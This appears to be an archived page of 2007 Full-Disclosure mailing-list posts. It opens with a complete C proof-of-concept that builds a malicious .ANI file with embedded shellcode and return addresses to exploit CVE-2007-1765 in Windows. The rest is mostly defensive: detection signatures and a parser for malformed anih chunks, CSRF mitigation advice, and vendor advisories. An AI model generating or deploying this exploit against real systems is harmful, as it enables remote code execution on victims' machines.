[Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
/*
 * Copyright (c) 2007 devcode
 *
 * ^^ D E V C O D E ^^
 *
 * Windows .ANI LoadAniIcon Stack Overflow
 * [CVE-2007-1765]
 *
 * Description:
 * A vulnerability has been identified in Microsoft Windows, which could be
 * exploited by remote attackers to take complete control of an affected
 * system. This issue is due to a stack overflow error within the
 * "LoadAniIcon()" [user32.dll] function when rendering cursors, animated
 * cursors or icons with a malformed header, which could be exploited by
 * remote attackers to execute arbitrary commands by tricking a user into
 * visiting a malicious web page or viewing an email message containing a
 * specially crafted ANI file.
 *
 * Hotfix/Patch:
 * None as of this time.
 *
 * Vulnerable systems:
 * Microsoft Windows 2000 Service Pack 4
 * Microsoft Windows XP Service Pack 2
 * Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
 * Microsoft Windows XP Professional x64 Edition
 * Microsoft Windows Server 2003
 * Microsoft Windows Server 2003 (Itanium)
 * Microsoft Windows Server 2003 Service Pack 1
 * Microsoft Windows Server 2003 Service Pack 1 (Itanium)
 * Microsoft Windows Server 2003 x64 Edition
 * Microsoft Windows Vista
 *
 * Microsoft Internet Explorer 6
 * Microsoft Internet Explorer 7
 *
 * This is a PoC and was created for educational purposes only. The author
 * is not held responsible if this PoC does not work or is used for any
 * other purposes than the one stated above.
 *
 * Notes:
 * For this to work on XP SP2 on explorer.exe, DEP has to be turned off.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";

char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\tWindows XP SP2 [0]\n"
"\tWindows 2K SP4 [1]\n\n"
"Usage: ani.exe ";

typedef struct {
    const char   *szTarget;
    unsigned char uszRet[5];
} TARGET;

TARGET targets[] = {
    { "Windows XP SP2", "\xC9\x29\xD4\x77" },   /* call esp */
    { "Windows 2K SP4", "\x29\x4C\xE1\x77" }
};

int main( int argc, char **argv )
{
    char  szBuffer[1024];
    FILE *f;

    if ( argc < 3 ) {
        printf("%s\n", szIntro );
        return 0;
    }

    printf("[+] Creating ANI header...\n");
    memset( szBuffer, 0x90, sizeof( szBuffer ) );
    memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

    printf("[+] Copying shellcode...\n");
    memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
    memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );

    printf("%s\n", argv[2] );
    f = fopen( argv[2], "wb" );
    if ( f == NULL ) {
        printf("[-] Cannot create file\n");
        return 0;
    }

    fwrite( szBuffer, 1, 1024, f );
    fclose( f );

    printf("[+] .ANI file successfully created!\n");
    return 0;
}
Re: [Full-disclosure] [WEB SECURITY] Preventing Cross-site Request Forgeries [ASP.NET crowd]
Actually that's not true. We should be clear that this is *not* the same
thing as ViewStateUserKey (which is not enabled by default).
EnableEventValidation does provide postback input related protections, but
ViewStateUserKey actually ties it to the user session. Without
ViewStateUserKey, you will notice the __EVENTVALIDATION nonce will be the
same for any two users. With ViewStateUserKey, the value will be unique per
user.

-----Original Message-----
From: Michael Sutton [mailto:[EMAIL PROTECTED]
Sent: Friday, March 30, 2007 3:59 PM
To: Chris Weber; pdp (architect); full-disclosure@lists.grok.org.uk; WASC Forum; webappsec @OWASP
Subject: RE: [WEB SECURITY] Preventing Cross-site Request Forgeries [ASP.NET crowd]

The EnableEventValidation page directive (enabled by default since .Net 2.0)
applies a nonce value for form validation and is also a strong control to
prevent CSRF attacks.

Michael Sutton
Security Evangelist
SPI Dynamics
http://portal.spidynamics.com/blogs/msutton

> -----Original Message-----
> From: Chris Weber [mailto:[EMAIL PROTECTED]
> Sent: Friday, March 30, 2007 6:12 PM
> To: 'pdp (architect)'; full-disclosure@lists.grok.org.uk; 'WASC Forum';
> 'webappsec @OWASP'
> Subject: RE: [WEB SECURITY] Preventing Cross-site Request Forgeries
> [ASP.NET crowd]
>
> Nice article.
>
> For the ASP.NET crowd out there, it will be even simpler: one line of
> code. Set the ViewStateUserKey property in your base class or page and the
> unique token protections (similar to CSRF_Guard) will be provided for you.
>
> http://msdn2.microsoft.com/en-us/library/system.web.ui.page.viewstateuserkey.aspx
>
> This protection mechanism has been available for many years, since the
> Framework 1.1
>
> -----Original Message-----
> From: pdp (architect) [mailto:[EMAIL PROTECTED]
> Sent: Friday, March 30, 2007 3:16 AM
> To: full-disclosure@lists.grok.org.uk; WASC Forum; webappsec @OWASP
> Subject: [WEB SECURITY] Preventing Cross-site Request Forgeries
>
> http://www.gnucitizen.org/blog/preventing-csrf
>
> I briefly covered how simple it is to prevent CSRF attacks. Hope that you
> find it useful.
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
>
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] n3td3v calls for immediate halt to the month of Myspace bugs
To all,

Crew-X Security and n3td3v call for the immediate halt of the month of
Myspace bugs.

Who is n3td3v...
http://n3td3v.googlepages.com

Our honeypot on Myspace...
http://myspace.com/n3td3v

Happy April fool(s),

n3td3v
Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows (CVE-2007-0038)
On Thu, 29 Mar 2007, Alexander Sotirov wrote:

> Today Microsoft released a security advisory about a vulnerability in the
> Animated Cursor processing code in Windows:
> http://www.microsoft.com/technet/security/advisory/935423.mspx
>
> It seems like the vulnerability is already exploited in the wild:
> http://asert.arbornetworks.com/2007/03/any-ani-file-could-infect-you/

Bleeding Edge Threats made available a Snort rule that detects some (all?)
exploits using this vulnerability:
http://www.bleedingthreats.net/index.php/2007/03/30/ms-ani-exploit-rule-details-emerging/

I don't know if this rule detects all possible exploits or just one
particular type. Here is a Firekeeper version of the rule, which can be
used to detect sites hosting malicious files:

alert (msg:"BLEEDING-EDGE CURRENT EVENTS MS ANI exploit"; body_content:"|54 53 49 4C 03 00 00 00 00 00 00 00 54 53 49 4C 04 00 00 00 02 02 02 02 61 6E 69 68 52|"; reference:url,http://isc.sans.org/diary.html?storyid=2534; reference:url,http://www.avertlabs.com/research/blog/?p=233; reference:url,doc.bleedingthreats.net/2003519; fid:2003519; rev:1;)

The rule is triggered for example by the following images:
http://www.i5460.net/admin12/2.jpg
http://www.i5460.net/admin12/1.jpg

Cheers,
Jan Wrobel
http://firekeeper.mozdev.org
[Full-disclosure] On-going Internet Emergency and Domain Names
There is a current on-going Internet emergency: a critical 0day
vulnerability currently exploited in the wild threatens numerous desktop
systems which are being compromised and turned into bots, and the domain
names hosting it are a significant part of the reason why this attack has
not yet been mitigated.

This incident is currently being handled by several operational groups.

This past February, I sent an email to the Reg-Ops (Registrar Operations)
mailing list. The email, which is quoted below, states how DNS abuse (not
the DNS infrastructure) is the biggest unmitigated current vulnerability in
day-to-day Internet security operations, not to mention abuse.

While we argue about this or that TLD, there are operational issues of the
highest importance that are not being addressed.

The following is my original email message, elaborating on these above
statements. Please note this was indeed just an email message, sent among
friends.

- Begin quoted message -

Date: Fri, 16 Feb 2007 02:32:46 -0600 (CST)
From: Gadi Evron
To: [EMAIL PROTECTED]
Subject: [reg-ops] Internet security and domain names

Hi all, this is a tiny bit long. Please have patience, this is important.

On this list (which we maintain as low-traffic) you guys (the registrars)
have shown a lot of care and have become, on our sister mitigation and
research lists (those of you who are subscribed), an integral part of our
community we now call "The Internet Security Operations Community".

We face problems today though, that you can not help us solve under the
current setting. But only you can help us come up with new ideas.

Day-to-day, we are able to report hundreds and thousands of completely
bogus phishing and other bad domains, but both policy-wise and
resources-wise, registrars can't handle this. I don't blame you.

In emergencies, we can only mitigate threats if one of you or yours are in
control..

Just a week ago we faced the problem of the Dolphins stadium being hacked
and malicious code being put on it:

1. We tracked down all the IP addresses involved and mitigated them (by we
   I mean also people other than me. Many were involved).
2. We helped the Dolphins Stadium IT staff take care of the malicious code
   on their web page - Specifically Gary Warner).
3. We coordinated with law enforcement.
4. We coordinated that no one does a press release which will hurt law
   enforcement.
5. We did a lot more. Including actually convincing a Chinese registrar to
   pull one of the domains in question. A miracle. There was another domain
   to be mitigated, unsuccessfully.

One thing though - at a second's notice, this could all be for nothing as
the DNS records could be updated with new IP addresses.

There were hundreds of other sites also infected. Even if we could find the
name server admin, some of these domains have as many as 40 NSs. That
doesn't make life easy. Then, these could change, too.

This is the weakest link online today in Internet security, which we in
most cases can't mitigate, and the only mitigation route is the domain
name.

Every day we see two types of fast-flux attacks:
1. Those that keep changing A records by using a very low TTL.
2. Those that keep changing NS records, pretty much the same.

Now, if we have a domain which can be mitigated to solve such emergencies
and one of you happen to run it, that's great... However, if we end up with
a domain not under the care of you and yours.. we are simply.. fucked.
Sorry for the language.

ICANN has a lot of policy issues as well, and the good guys there can't
help. ICANN has enough trouble taking care of all those who want money for
.com, .net or .xxx.

All that being said, the current situation can not go on. We can no longer
ignore it nor are current measures sufficient. It is imperative that we
find some solutions, as limited as they may be.

We need to be able to get rid of domain names, at the very least during
real emergencies. I am aware how it isn't always easy to distinguish what
is good and what is bad. Still, we need to find a way.

Members of reg-ops: What do you think can be conceivably done? How can we
make a difference which is REALLY needed on today's Internet?

Please participate and let me know what you think, we simply can no longer
wait for some magical change to happen.

Gadi.

- End of quoted message -

Thousands of malicious domain names and several weeks later, we face the
current crisis. The 0day vulnerability is exploited in the wild, and
mitigating the IP addresses is not enough. We need to be able to "get rid"
of malicious domain names.

We need to be able to mitigate attacks on the weakest link - DNS, which are
not necessarily solved by DNS-SEC or Anycast.

On Reg-Ops and other operational groups, we came up with some imperfect
ideas on what we can make happen on our own in short term which will help
us reach better mitigation, as security does not seem to be on the agenda
of those running DNS:

1. A system by which registrars can ackn
Re: [Full-disclosure] [WEB SECURITY] Preventing Cross-site Request Forgeries [ASP.NET crowd]
The EnableEventValidation page directive (enabled by default since .Net 2.0)
applies a nonce value for form validation and is also a strong control to
prevent CSRF attacks.

Michael Sutton
Security Evangelist
SPI Dynamics
http://portal.spidynamics.com/blogs/msutton

> -----Original Message-----
> From: Chris Weber [mailto:[EMAIL PROTECTED]
> Sent: Friday, March 30, 2007 6:12 PM
> To: 'pdp (architect)'; full-disclosure@lists.grok.org.uk; 'WASC Forum';
> 'webappsec @OWASP'
> Subject: RE: [WEB SECURITY] Preventing Cross-site Request Forgeries
> [ASP.NET crowd]
>
> Nice article.
>
> For the ASP.NET crowd out there, it will be even simpler: one line of
> code. Set the ViewStateUserKey property in your base class or page and the
> unique token protections (similar to CSRF_Guard) will be provided for you.
>
> http://msdn2.microsoft.com/en-us/library/system.web.ui.page.viewstateuserkey.aspx
>
> This protection mechanism has been available for many years, since the
> Framework 1.1
>
> -----Original Message-----
> From: pdp (architect) [mailto:[EMAIL PROTECTED]
> Sent: Friday, March 30, 2007 3:16 AM
> To: full-disclosure@lists.grok.org.uk; WASC Forum; webappsec @OWASP
> Subject: [WEB SECURITY] Preventing Cross-site Request Forgeries
>
> http://www.gnucitizen.org/blog/preventing-csrf
>
> I briefly covered how simple it is to prevent CSRF attacks. Hope that you
> find it useful.
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
Re: [Full-disclosure] [WEB SECURITY] Preventing Cross-site Request Forgeries [ASP.NET crowd]
Nice article.

For the ASP.NET crowd out there, it will be even simpler: one line of
code. Set the ViewStateUserKey property in your base class or page and the
unique token protections (similar to CSRF_Guard) will be provided for you.

http://msdn2.microsoft.com/en-us/library/system.web.ui.page.viewstateuserkey.aspx

This protection mechanism has been available for many years, since the
Framework 1.1

-----Original Message-----
From: pdp (architect) [mailto:[EMAIL PROTECTED]
Sent: Friday, March 30, 2007 3:16 AM
To: full-disclosure@lists.grok.org.uk; WASC Forum; webappsec @OWASP
Subject: [WEB SECURITY] Preventing Cross-site Request Forgeries

http://www.gnucitizen.org/blog/preventing-csrf

I briefly covered how simple it is to prevent CSRF attacks. Hope that you
find it useful.

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
Re: [Full-disclosure] CA BrightStor ARCserve Backup Mediasvr.exevulnerability
> If you discover a vulnerability in CA products, please report
> your findings to vuln at ca dot com, or utilize our "Submit a
> Vulnerability" form at
> http://www3.ca.com/securityadvisor/vulninfo/submit.aspx.

Looks like a vuln is found once a week in C.A. products, esp. in your
Backup and Anti-Viri products. 3 are listed currently on your own page
http://www3.ca.com/securityadvisor/vulninfo/ and um...
http://www3.ca.com/securityadvisor/vulninfo/search.aspx?mode=tmc&pst="computer%20associates";

tired of seeing C.A. exploits!!! especially the corporate products, your
clients must thank you for providing remote access in EVERY PROGRAM YOU
RELEASE ( i know the blackhats do )

please delete these products from your catalog.

m.w
Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows(CVE-2007-0038)
You really need to check for:

RIFF[4 byte file size]  <-- The file size can be ignored.

Then the next 4 bytes after the file size should contain: ACON

Then look for: anih and the 4 byte value following it greater than 0x50,
this is the stack buffer overflow point.

New ANIs can be built with any number of anih chunks and only one of them
needs to be larger than 80 bytes decimal.

Cheers,

Eric Sites, CTO
Sunbelt Software

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Alexander Sotirov
Sent: Friday, March 30, 2007 8:29 PM
To: Jan Wrobel
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows(CVE-2007-0038)

Jan Wrobel wrote:
> I don't know if this rule detects all possible exploits or just one
> particular type. Here is a Firekeeper version of the rule, which can
> be used to detect sites hosting malicious files:
>
> alert (msg:"BLEEDING-EDGE CURRENT EVENTS MS ANI exploit"; body_content:"|54 53 49 4C 03 00 00 00 00 00 00 00 54 53 49 4C 04 00 00 00 02 02 02 02 61 6E 69 68 52|"; reference:url,http://isc.sans.org/diary.html?storyid=2534; reference:url,http://www.avertlabs.com/research/blog/?p=233; reference:url,doc.bleedingthreats.net/2003519; fid:2003519; rev:1;)

A better way would be to look for all files that start with "RIFF" and
contain two copies of the string "anih", the first one followed by the
dword 0x24, the second one followed by a dword that's not 0x24. This
should detect the exploitation of the stack overflow with no false
negatives. To avoid false positives, you'll need code to parse all records
in the ANI file and check for an "anih" record with a size not equal to
0x24.

Here's the regexp in Perl (somebody please convert it to a Snort rule):

/^RIFF.*anih\x24\x00\x00\x00.*anih(?!\x24\x00\x00\x00)/

Alex
[Full-disclosure] CA BrightStor ARCserve Backup Mediasvr.exe vulnerability
CA is aware that functional exploit code was publicized on March 30, 2007
for a CA BrightStor ARCserve Backup Mediasvr.exe vulnerability. We have
verified that a high risk vulnerability does exist and we are now working
on a patch to address the issue.

CA recommends that BrightStor ARCserve Backup users implement the following
temporary workaround to mitigate the vulnerability:

1) Rename the "mediasvr.exe" file to a non-functional file name, such as
   "mediasvc.exe.disable".
2) Then restart the CA BrightStor Tape Engine service.

This will disable the command line functionality in the product (i.e.
command line utilities such as ca_backup, ca_restore, ca_merge, ca_qmgr,
ca_scan, etc will not work).

After we have completed our analysis of the issue, we will post an update
and patches on the CA SupportConnect website.

If additional information is required, please contact CA Technical Support
at http://supportconnect.ca.com.

If you discover a vulnerability in CA products, please report your findings
to vuln at ca dot com, or utilize our "Submit a Vulnerability" form at
http://www3.ca.com/securityadvisor/vulninfo/submit.aspx.

Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, One CA Plaza, Islandia, NY 11749

Contact http://www3.ca.com/contact/
Legal Notice http://www3.ca.com/legal/
Privacy Policy http://www3.ca.com/privacy/
Copyright (c) 2007 CA. All rights reserved.
Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows (CVE-2007-0038)
Jan Wrobel wrote:
> I don't know if this rule detects all possible exploits or just one
> particular type. Here is a Firekeeper version of the rule, which can
> be used to detect sites hosting malicious files:
>
> alert (msg:"BLEEDING-EDGE CURRENT EVENTS MS ANI exploit"; body_content:"|54
> 53 49 4C 03 00 00 00 00 00 00 00 54 53 49 4C 04 00 00 00 02 02 02 02 61 6E 69
> 68 52|"; reference:url,http://isc.sans.org/diary.html?storyid=2534;
> reference:url,http://www.avertlabs.com/research/blog/?p=233;
> reference:url,doc.bleedingthreats.net/2003519; fid:2003519; rev:1;)

A better way would be to look for all files that start with "RIFF" and
contain two copies of the string "anih", the first one followed by the
dword 0x24, the second one followed by a dword that's not 0x24. This
should detect the exploitation of the stack overflow with no false
negatives. To avoid false positives, you'll need code to parse all records
in the ANI file and check for an "anih" record with a size not equal to
0x24.

Here's the regexp in Perl (somebody please convert it to a Snort rule):

/^RIFF.*anih\x24\x00\x00\x00.*anih(?!\x24\x00\x00\x00)/

Alex
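An added example, not code from any message in this thread, of the "parse all records" check Alex asks for above, combined with the 0x50 threshold Eric Sites gives in his reply earlier on this page: it walks the RIFF chunk tree (descending into LIST containers) instead of searching bytes, so an 'anih' string that merely occurs inside icon pixel data does not trip it, and it runs Alex's regexp on the same input for comparison. The chunk builders, field values and the three sample files are constructed for this example; the 'suspicious'/'overflow' verdict names are this example's own.

```python
"""Structural check for oversized 'anih' chunks in ANI (RIFF/ACON) files.

Constructed example. Chunk layout as described in the thread: 'RIFF' + u32 size,
'ACON', then chunks of <fourcc><u32 size><payload>; 'LIST' chunks carry a 4-byte
list type followed by nested chunks.
"""
import re
import struct

ANIH_EXPECTED_SIZE = 0x24   # documented 36-byte anih header (nine DWORD fields)
ANIH_OVERFLOW_SIZE = 0x50   # Eric Sites: an anih length above this is the overflow point

# Alex Sotirov's Perl regexp, as posted, for comparison with the structural walk.
SOTIROV_RE = re.compile(rb'^RIFF.*anih\x24\x00\x00\x00.*anih(?!\x24\x00\x00\x00)', re.DOTALL)


def walk_chunks(data, start, end, depth=0, findings=None):
    """Walk RIFF chunks in data[start:end], descending into LIST containers.

    Appends ('anih', declared_size, offset) for every anih chunk and
    ('TRUNCATED', declared_size, offset) when a declared size runs past the
    buffer, which is itself a malformed-header symptom.
    """
    if findings is None:
        findings = []
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from('<I', data, pos + 4)[0]
        payload = pos + 8
        if fourcc == b'anih':
            findings.append(('anih', size, pos))
        if payload + size > end:
            findings.append(('TRUNCATED', size, pos))
            break
        if fourcc == b'LIST' and size >= 4 and depth < 4:
            walk_chunks(data, payload + 4, payload + size, depth + 1, findings)
        pos = payload + size + (size & 1)   # RIFF pads odd-length payloads to even
    return findings


def scan_ani(data):
    """Return (verdict, findings): 'not-ani', 'clean', 'suspicious' or 'overflow'.

    'suspicious' = an anih length other than 0x24 or a truncated chunk (the
    condition behind the regexp); 'overflow' = an anih length above 0x50.
    """
    if len(data) < 12 or data[:4] != b'RIFF' or data[8:12] != b'ACON':
        return 'not-ani', []
    findings = walk_chunks(data, 12, len(data))   # RIFF size field deliberately ignored
    sizes = [s for tag, s, _ in findings if tag == 'anih']
    if any(s > ANIH_OVERFLOW_SIZE for s in sizes):
        return 'overflow', findings
    if any(s != ANIH_EXPECTED_SIZE for s in sizes) or any(tag == 'TRUNCATED' for tag, _, _ in findings):
        return 'suspicious', findings
    return 'clean', findings


def regex_matches(data):
    """True if Alex's byte-pattern regexp fires on the data."""
    return SOTIROV_RE.search(data) is not None


# --- constructed sample files (not real-world captures) ---------------------------
def chunk(fourcc, payload):
    pad = b'\x00' if len(payload) & 1 else b''
    return fourcc + struct.pack('<I', len(payload)) + payload + pad


def riff_acon(body):
    return b'RIFF' + struct.pack('<I', len(body) + 4) + b'ACON' + body


ANIH_OK = struct.pack('<9I', 0x24, 1, 1, 0, 0, 0, 0, 10, 1)   # exactly 36 bytes
FRAME_LIST = chunk(b'LIST', b'fram' + chunk(b'icon', b'\x00' * 22))
BENIGN_ANI = riff_acon(chunk(b'anih', ANIH_OK) + FRAME_LIST)
# A second anih declaring 0x60 bytes: the shape both messages describe.
MALFORMED_ANI = riff_acon(chunk(b'anih', ANIH_OK) + FRAME_LIST + chunk(b'anih', b'\x00' * 0x60))
# Icon pixel data that merely contains the bytes 'anih' plus a non-0x24 dword.
LOOKALIKE_ANI = riff_acon(chunk(b'anih', ANIH_OK) +
                          chunk(b'LIST', b'fram' + chunk(b'icon', b'anih\x60\x00\x00\x00' + b'\x00' * 14)))

if __name__ == '__main__':
    for name, blob in (('benign', BENIGN_ANI), ('malformed', MALFORMED_ANI), ('lookalike', LOOKALIKE_ANI)):
        verdict, found = scan_ani(blob)
        print(f"{name:10s} parser={verdict:10s} regexp={regex_matches(blob)!s:5s} "
              f"anih sizes={[hex(s) for tag, s, _ in found if tag == 'anih']}")
```

The lookalike sample shows the false positive Alex warns about: the regexp fires on it while the chunk walk reports it clean.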
Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability
On 3/30/07, James Matthews <[EMAIL PROTECTED]> wrote:
> Now all we need is an exploit... I am thinking why isn't there a Month of
> windows bugs..

http://www.securinfos.info/english/the-week-of-vista-bugs.php [en]
http://movb.blogspot.com/ [fr]

--
Guasconi Vincent
Student.
http://altmylife.blogspot.com
[Full-disclosure] TSRT-07-03: America Online SuperBuddy ActiveX Control Code Execution Vulnerability
TSRT-07-03: America Online SuperBuddy ActiveX Control Code Execution
http://www.tippingpoint.com/security/advisories/TSRT-07-03.html
March 30, 2007

-- CVE ID:
CVE-2006-5820

-- Affected Vendor:
America Online

-- Affected Products:
America Online 9.0 Security Edition

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability
since November 6, 2006 by Digital Vaccine protection filter ID 4553. For
further product information on the TippingPoint IPS:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on vulnerable
installations of America Online with Microsoft Internet Explorer. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page.

The specific flaw exists in the LinkSBIcons() method exposed through the
ActiveX control 'Sb.SuperBuddy.1' with the following CLSID:

    189504B8-50D1-4AA8-B4D6-95C8F58A6414

The affected control implements the IObjectSafety interface and therefore
allows a web site to invoke the control under default Internet Explorer
settings without any further user interaction. The vulnerable method is
defined as:

    int LinkSBIcons(IUnknown *interface)

As the method accepts an unchecked user-controlled value specifying a
pointer to an object, a subsequent function dereference is completely under
attacker control. This can easily lead to arbitrary code execution under
the context of the logged in user.

It is important to note that many PCs ship with this vulnerable component
by default, including Dell and Hewlett-Packard among others. Since AOL is
addressing this issue as an update through their internet service, many
users are left without any recourse for mitigation. Concerned users can
specify a "kill bit" for the affected control to prevent it from loading
within Internet Explorer. To do so, create the following registry key:

    HKEY_LOCAL_MACHINE\
      SOFTWARE\
        Microsoft\
          Internet Explorer\
            ActiveX Compatibility\
              {189504B8-50D1-4AA8-B4D6-95C8F58A6414}

With the value 'Compatibility Flags' set to 0x400.

-- Vendor Response:
America Online has issued an update to correct this vulnerability as of
3/29/2007. The update is automatically applied the next time users log into
the AOL service.

-- Disclosure Timeline:
2006.07.18 - Vulnerability reported to vendor
2006.11.06 - Digital Vaccine released to TippingPoint customers
2007.03.30 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, Tipping Point Security
Research Team.
Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability
On Fri, 2007-03-30 at 12:46 -0700, James Matthews wrote:
> I am thinking why isn't there a Month of windows bugs..

LOL! :-)

Simply because that's what the other 11 months in a year are for.

-Jim P.
[Full-disclosure] [ GLSA 200703-26 ] file: Integer underflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200703-26
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: file: Integer underflow
      Date: March 30, 2007
      Bugs: #171452
        ID: 200703-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer underflow vulnerability has been reported in file allowing for
the user-assisted execution of arbitrary code.

Background
==========

file is a utility that guesses a file format by scanning binary data for
patterns.

Affected packages
=================

    -------------------------------------------------------------------
     Package         /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  sys-apps/file       < 4.20                               >= 4.20

Description
===========

Jean-Sébastien Guay-Leroux reported an integer underflow in the
file_printf function.

Impact
======

A remote attacker could entice a user to run the "file" program on a
specially crafted file that would trigger a heap-based buffer overflow
possibly leading to the execution of arbitrary code with the rights of
the user running "file". Note that this vulnerability could be also
triggered through an automatic file scanner like amavisd-new.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

Since file is a system package, all Gentoo users should upgrade to the
latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=sys-apps/file-4.20"

References
==========

  [ 1 ] CVE-2007-1536
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1536

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-26.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability
Now all we need is an exploit... I am thinking why isn't there a Month of
windows bugs..

On 3/30/07, 3APA3A <[EMAIL PROTECTED]> wrote:
> Dear Michał Majchrowicz,
>
> This image also effectively exploits stack overflow (?) in FastStone
> Image Viewer 2.8, EIP/EBP is 0x41414141.
>
> --Monday, March 26, 2007, 12:20:07 AM, you wrote to [EMAIL PROTECTED]:
>
> MM> Everytime you try to turn on the slideshow with a JPG file in the
> MM> folder you get BSoD
> MM> (http://sectroyer.110mb.com/vuln/vista_bsod.jpg). You can test it by
> MM> turning on the slideshow in the following directory:
> MM> c:\Windows\Web\Wallpaper\
>
> Since this case cannot be connected with
>
> --
> ~/ZARAZA
> http://securityvulns.com/
> Patriotism is just another religion. (Twain)

--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com
